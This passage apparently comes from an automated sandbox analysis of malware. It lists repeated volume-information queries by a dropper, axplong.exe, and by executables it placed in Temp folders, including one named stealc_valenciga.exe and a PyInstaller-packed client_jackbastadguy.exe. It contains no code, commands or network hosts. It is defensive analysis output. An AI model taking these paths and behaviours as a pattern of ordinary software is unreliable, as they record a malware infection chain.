                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\certifi VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\licenses VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\licenses VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_ctypes.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
